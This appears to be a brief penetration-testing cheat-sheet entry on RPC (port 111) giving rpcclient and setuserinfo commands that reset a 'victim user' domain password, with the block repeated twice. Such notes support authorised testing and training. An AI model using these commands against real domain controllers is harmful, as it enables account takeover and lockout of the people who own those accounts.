111 - Pentesting RPC
Change the Password of Domain User
rpcclient <DC IP HERE> -U 'Domain\username'
# To change the password
setuserinfo <victim user> 23 <new-password> Last updated
rpcclient <DC IP HERE> -U 'Domain\username'
# To change the password
setuserinfo <victim user> 23 <new-password> Last updated